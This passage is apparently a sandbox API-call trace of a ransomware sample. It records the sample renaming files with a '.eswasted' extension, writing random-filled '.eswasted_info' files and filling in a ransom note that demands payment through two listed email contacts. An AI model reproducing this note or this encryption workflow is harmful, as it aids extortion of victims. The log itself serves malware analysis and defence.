returned=".eswasted_info" [0083.109] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0083.109] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e5ff0) returned 1 [0083.110] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4dd498 | out: pbBuffer=0x4dd498) returned 1 [0083.110] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0083.110] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Entertainment.url.eswasted_info" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn entertainment.url.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x100 [0083.111] WriteFile (in: hFile=0x100, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0083.112] SetEndOfFile (hFile=0x100) returned 1 [0083.112] SetFilePointer (in: hFile=0x100, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0083.112] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0083.112] lstrcpyW (in: lpString1=0x4d922a, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0083.112] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Entertainment.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn entertainment.url"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Entertainment.url.eswasted" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn entertainment.url.eswasted")) returned 1 [0083.161] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Entertainment.url.eswasted" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn entertainment.url.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0083.161] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xfc [0083.161] GetFileSize (in: hFile=0x110, lpFileSizeHigh=0x111fdd4 | out: lpFileSizeHigh=0x111fdd4*=0x0) returned 0x85 [0083.161] MapViewOfFile (hFileMappingObject=0xfc, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x85) returned 0x2d0000 [0083.161] CloseHandle (hObject=0x110) returned 1 [0083.250] UnmapViewOfFile (lpBaseAddress=0x2d0000) returned 1 [0083.250] CloseHandle (hObject=0xfc) returned 1 [0083.250] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x200) returned 0x4de250 [0083.250] CryptAcquireContextW (in: phProv=0x111fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fdc4*=0x4e5ff0) returned 1 [0083.251] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4de298 | out: pbBuffer=0x4de298) returned 1 [0083.251] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0083.251] CryptAcquireContextW (in: phProv=0x111fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fb2c*=0x4e5ff0) returned 1 [0083.252] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x111fb48 | out: pbBuffer=0x111fb48) returned 1 [0083.252] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0083.260] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x403) returned 0x4de458 [0083.260] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4de250 | out: hHeap=0x4a0000) returned 1 [0083.260] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0083.260] _snwprintf (in: _Dest=0x4dd498, _Count=0x523, _Format="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]oP1lzOxfO/YT4sa3Jen7w8G47f9O3vSyBB7f0Ql22ha51Rf/gopKhnfp0e5eYoBj\r\nQocJmdxsPv4BeBBV2DAaeWLS3MqngseyPOKvKD5JMMNfdqwTFgwcOFRQ+O8ILvvA\r\n8R+mHJU4Z0kAA05x9GaufSl0Rr86SXBVcyL8FleeSZSXy+lsZuftCH/byfQnVFTr\r\n2lv5bUY9TnkN6UwtZxvCIaWLIc1R9jnD3N0+xTwtCQduApdiub/J8MtNPk2voSvj\r\ngezwY6pT2t18BQMdmYNJRnnlwcpZ2o67lhyqqcBxpFSRgDIb1yEfSzV5pt+GeSw5\r\nLGvD8Z7Lbs1vBYwN8CeJRNkT1mycgtf96Tv6VpMBJjPcbAPCZNb58KIKgfBOfmYk\r\nw2GxBi/3pEOyxHJ8rXJG1SnVBIIABTpmH+nx/CDiSvOpvvSUl9TuBLwQ09C3RgPq\r\nSayKL4k8wPkoaHfak7ZAfiawzKuti0Nme0YNc1RcoRf/TAOdwe2ot4JrYsyOxGmy\r\n4aRZHin2Q1FSICuOdHnNYJ2HW3Ep+fVcgEr+TA3f2XjE8ty3HLjm9o5TIEFJgVPm\r\nJM/fGIzjdMR29c6xmHIsCOSXV4tI/+IkBpEOGjdFoNw3WppT1iGOk4O6jo+QZ3u7\r\nCaRXtTQdclDOeLAlvMIJkHyA7+gPa8W70WGcP8x6GLR=[end_key]\r\nKEEP IT\r\n") returned 990 [0083.260] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4de458 | out: hHeap=0x4a0000) returned 1 [0083.260] WriteFile (in: hFile=0x100, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0x7bc, lpNumberOfBytesWritten=0x111fe38, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x111fe38*=0x7bc, lpOverlapped=0x0) returned 1 [0083.260] SetEndOfFile (hFile=0x100) returned 1 [0083.262] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0083.262] CloseHandle (hObject=0x100) returned 1 [0083.265] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d91a8 | out: hHeap=0x4a0000) returned 1 [0083.265] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4fab88 | out: hHeap=0x4a0000) returned 1 [0083.265] _aulldvrm () returned 0x0 [0083.265] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e5ff0) returned 1 [0083.266] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0083.266] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0083.266] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSNBC News.url") returned 58 [0083.266] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x27e) returned 0x4d91a8 [0083.266] lstrcpyW (in: lpString1=0x4d921c, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0083.266] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0083.266] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e5ff0) returned 1 [0083.267] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4dd498 | out: pbBuffer=0x4dd498) returned 1 [0083.267] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0083.267] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSNBC News.url.eswasted_info" (normalized: "c:\\users\\default\\favorites\\msn websites\\msnbc news.url.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x100 [0083.275] WriteFile (in: hFile=0x100, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0083.276] SetEndOfFile (hFile=0x100) returned 1 [0083.276] SetFilePointer (in: hFile=0x100, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0083.276] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0083.276] lstrcpyW (in: lpString1=0x4d921c, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0083.276] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSNBC News.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msnbc news.url"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSNBC News.url.eswasted" (normalized: "c:\\users\\default\\favorites\\msn websites\\msnbc news.url.eswasted")) returned 1 [0083.282] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSNBC News.url.eswasted" (normalized: "c:\\users\\default\\favorites\\msn websites\\msnbc news.url.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0083.282] CreateFileMappingW (hFile=0xfc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0083.283] GetFileSize (in: hFile=0xfc, lpFileSizeHigh=0x111fdd4 | out: lpFileSizeHigh=0x111fdd4*=0x0) returned 0x85 [0083.283] MapViewOfFile (hFileMappingObject=0x110, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x85) returned 0x2d0000 [0083.283] CloseHandle (hObject=0xfc) returned 1 [0083.284] UnmapViewOfFile (lpBaseAddress=0x2d0000) returned 1 [0083.284] CloseHandle (hObject=0x110) returned 1 [0083.284] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x200) returned 0x4de250 [0083.284] CryptAcquireContextW (in: phProv=0x111fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fdc4*=0x4e5ff0) returned 1 [0083.285] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4de298 | out: pbBuffer=0x4de298) returned 1 [0083.285] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0083.285] CryptAcquireContextW (in: phProv=0x111fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fb2c*=0x4e5ff0) returned 1 [0083.286] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x111fb48 | out: pbBuffer=0x111fb48) returned 1 [0083.286] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0083.294] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x403) returned 0x4de458 [0083.294] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4de250 | out: hHeap=0x4a0000) returned 1 [0083.294] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0083.294] _snwprintf (in: _Dest=0x4dd498, _Count=0x523, _Format="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]dGTxT/FVQmgm/z0aujcxqUymlYwuGjzTHzfx4R95UNM6u9HbEzc1TqWc99twlgo9\r\nuLPKcH3ePFimqaKWboFLU8YX+4r5ccqfpnMcjcLaPEg66icIbvMWlwrPH5vFBcZ4\r\nhnjW2NgebTh/W/UD/23AeDV32SJmpGIhWnghplXj1j3SrVF9ZP0YBOM6QVfUnPeg\r\nd7P6pSEvRUnrNGxysRok2q6JZyNiyRmM7nlEo8ZAW47hZAaqmVU2HIwr+z/RGMh0\r\nmiI2rO7hF2rh5KOsBRW7PmCdQvA3DjN5/5lJpok28oRQoZinRnLSfj4yc/HvFsY2\r\nFVCeoG1KVW66E3lgBuBORGwQxkCgSEqnigN2d3302CFkGqWCu2Hqz4tdqPTMmMRq\r\nv9jC/gClB8ZDK5RWdLUem5BfvJofZCjjRr/ZShGZH+DbcF6QaoVhX1wU8ar6Q6lS\r\nkVE7HdzykaKNcOyb8pNvJcixeRU7/wpf/1Brdg7o5Gbpwrhm7K//G/tXrYlKwn8o\r\n13KsFtIAa6Pvq/Tzm/8v35STae9WXphpyd4ef1n/JzQUg4MPmBofCI253pbxfU/J\r\ndA9u4pnTXsUSTHPQeYl+qz1sZqILlRo81AxUekPLW6NVaJS0/Y3Hvl5Sz+R5/Vn2\r\nYunxHofbRW3QlfiHcDv/8hJRv+OOl/uuARP1qTNPkwd=[end_key]\r\nKEEP IT\r\n") returned 990 [0083.294] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4de458 | out: hHeap=0x4a0000) returned 1 [0083.294] WriteFile (in: hFile=0x100, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0x7bc, lpNumberOfBytesWritten=0x111fe38, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x111fe38*=0x7bc, lpOverlapped=0x0) returned 1 [0083.294] SetEndOfFile (hFile=0x100) returned 1 [0083.296] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0083.296] CloseHandle (hObject=0x100) returned 1 [0083.299] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d91a8 | out: hHeap=0x4a0000) returned 1 [0083.299] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4f4c48 | out: hHeap=0x4a0000) returned 1 [0083.299] _aulldvrm () returned 0x0 [0083.299] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e5ff0) returned 1 [0083.347] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0083.347] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0083.347] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Get Windows Live.url") returned 64 [0083.347] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x28a) returned 0x4d91a8 [0083.348] lstrcpyW (in: lpString1=0x4d9228, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0083.348] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0083.348] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e5ff0) returned 1 [0083.348] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4dd498 | out: pbBuffer=0x4dd498) returned 1 [0083.348] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0083.348] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Get Windows Live.url.eswasted_info" (normalized: "c:\\users\\default\\favorites\\windows live\\get windows live.url.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x100 [0083.350] WriteFile (in: hFile=0x100, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0083.351] SetEndOfFile (hFile=0x100) returned 1 [0083.351] SetFilePointer (in: hFile=0x100, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0083.351] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0083.351] lstrcpyW (in: lpString1=0x4d9228, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0083.351] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Get Windows Live.url" (normalized: "c:\\users\\default\\favorites\\windows live\\get windows live.url"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Get Windows Live.url.eswasted" (normalized: "c:\\users\\default\\favorites\\windows live\\get windows live.url.eswasted")) returned 1 [0083.396] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Get Windows Live.url.eswasted" (normalized: "c:\\users\\default\\favorites\\windows live\\get windows live.url.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0083.396] CreateFileMappingW (hFile=0xfc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0083.396] GetFileSize (in: hFile=0xfc, lpFileSizeHigh=0x111fdd4 | out: lpFileSizeHigh=0x111fdd4*=0x0) returned 0x85 [0083.396] MapViewOfFile (hFileMappingObject=0x110, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x85) returned 0x2d0000 [0083.396] CloseHandle (hObject=0xfc) returned 1 [0083.399] UnmapViewOfFile (lpBaseAddress=0x2d0000) returned 1 [0083.399] CloseHandle (hObject=0x110) returned 1 [0083.399] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x200) returned 0x4de278 [0083.399] CryptAcquireContextW (in: phProv=0x111fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fdc4*=0x4e5ff0) returned 1 [0083.400] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4de2c0 | out: pbBuffer=0x4de2c0) returned 1 [0083.400] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0083.400] CryptAcquireContextW (in: phProv=0x111fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fb2c*=0x4e5ff0) returned 1 [0083.401] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x111fb48 | out: pbBuffer=0x111fb48) returned 1 [0083.401] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0083.411] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x403) returned 0x4de480 [0083.411] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4de278 | out: hHeap=0x4a0000) returned 1 [0083.411] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0083.411] _snwprintf (in: _Dest=0x4dd498, _Count=0x523, _Format="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]gtOu7fTBVHxKuMZTOUm4+zQN2FHwSXxRVTm4Zu3zO5HCksHUfXKEpI8mTXw+xGAL\r\nbDCBbxKa2il6ZiQerD4hGipBzkonnbp79UqnLDARR7rHbiG9GytuzYm0gP/Qov7q\r\ncKiocLVw+DKSCtt8qX9P1XC7S/DgpjpblVydNKvy/iXWt9+ETN2yOh8Pq6qHw6Vt\r\nsr3WbVGHT3Dk2hV2dnmk58QLD0k/OYdrxjoD31p+P+iOrLtCTaVY5r5Izl3a14cR\r\nHkr6XgXtEVe2KhNXAYdjWkqENOzft/+7pKEnn8EmPQ+SheJF0LoYlM1JWu42GoaO\r\nTLQB7POSRPIV630gR7tOrD5qzp9FzGkx62LBHKFq6OgKx4zAFoMjeZb498VeNKdg\r\n2XuN++ar8POF++Wra6Yz50tVFtmHMw8NDF0Yly58cUDNXRVLUCLZBKteQaWOYRnZ\r\nr+P4L4tbP7zWDnmfXqfZcZTi8pVa4xAf40PganhmZAyCzva6wVrxnh8MG0QrcVWB\r\nrU3PbX4/2ehpcKBoJCkBiV5rATwqOyj72xKceQQAE9EPzbdP5ayljMq704FftNYb\r\nu2HptnmmBotJIUzotIXlHG/SFnJM+6ycBp3fkkxSaUEXCKG4vd4WE2mS668jMEzC\r\n4m3kRDomR57uEm3Q38f+zUrICVdexJzQVRpt+WAwPD0=[end_key]\r\nKEEP IT\r\n") returned 990 [0083.411] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4de480 | out: hHeap=0x4a0000) returned 1 [0083.411] WriteFile (in: hFile=0x100, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0x7bc, lpNumberOfBytesWritten=0x111fe38, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x111fe38*=0x7bc, lpOverlapped=0x0) returned 1 [0083.411] SetEndOfFile (hFile=0x100) returned 1 [0083.413] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0083.413] CloseHandle (hObject=0x100) returned 1 [0083.416] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d91a8 | out: hHeap=0x4a0000) returned 1 [0083.416] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4fac68 | out: hHeap=0x4a0000) returned 1 [0083.416] _aulldvrm () returned 0x0 [0083.416] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e5ff0) returned 1 [0083.417] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0083.417] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0083.417] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Mail.url") returned 65 [0083.417] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x28c) returned 0x4d91a8 [0083.417] lstrcpyW (in: lpString1=0x4d922a, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0083.417] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0083.417] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e5ff0) returned 1 [0083.418] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4dd498 | out: pbBuffer=0x4dd498) returned 1 [0083.418] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0083.418] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Mail.url.eswasted_info" (normalized: "c:\\users\\default\\favorites\\windows live\\windows live mail.url.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x100 [0083.418] WriteFile (in: hFile=0x100, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0083.419] SetEndOfFile (hFile=0x100) returned 1 [0083.419] SetFilePointer (in: hFile=0x100, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0083.419] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0083.419] lstrcpyW (in: lpString1=0x4d922a, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0083.420] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Mail.url" (normalized: "c:\\users\\default\\favorites\\windows live\\windows live mail.url"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Mail.url.eswasted" (normalized: "c:\\users\\default\\favorites\\windows live\\windows live mail.url.eswasted")) returned 1 [0083.420] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Mail.url.eswasted" (normalized: "c:\\users\\default\\favorites\\windows live\\windows live mail.url.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0083.420] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xfc [0083.420] GetFileSize (in: hFile=0x110, lpFileSizeHigh=0x111fdd4 | out: lpFileSizeHigh=0x111fdd4*=0x0) returned 0x85 [0083.421] MapViewOfFile (hFileMappingObject=0xfc, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x85) returned 0x2d0000 [0083.421] CloseHandle (hObject=0x110) returned 1 [0083.422] 